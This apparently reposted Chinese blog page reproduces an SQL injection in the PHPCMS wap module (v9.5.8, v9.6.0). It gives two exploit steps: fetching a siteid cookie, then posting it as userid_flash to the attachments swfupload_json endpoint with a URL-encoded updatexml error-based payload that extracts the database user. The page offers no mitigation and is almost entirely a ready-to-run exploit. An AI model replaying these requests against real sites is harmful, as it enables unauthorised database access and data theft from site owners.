【漏洞复现】PHPCMS wap模块 SQL注入(附EXP)

漏洞影响版本:v9.5.8、v9.6.0

Step1:

  访问:index.php?m=wap&a=index&siteid=1

  获取返回的cookie:xxx_siteid=xxx1

【漏洞复现】PHPCMS wap模块 SQL注入(附EXP)

 

Step2:

  构造POST数据,利用Step1返回的cookie值,赋值给userid_flash变量:userid_flash=xxx1

  然后以POST方式访问以下链接:

:82/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26%E4%B8%8D

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zzwxjj.html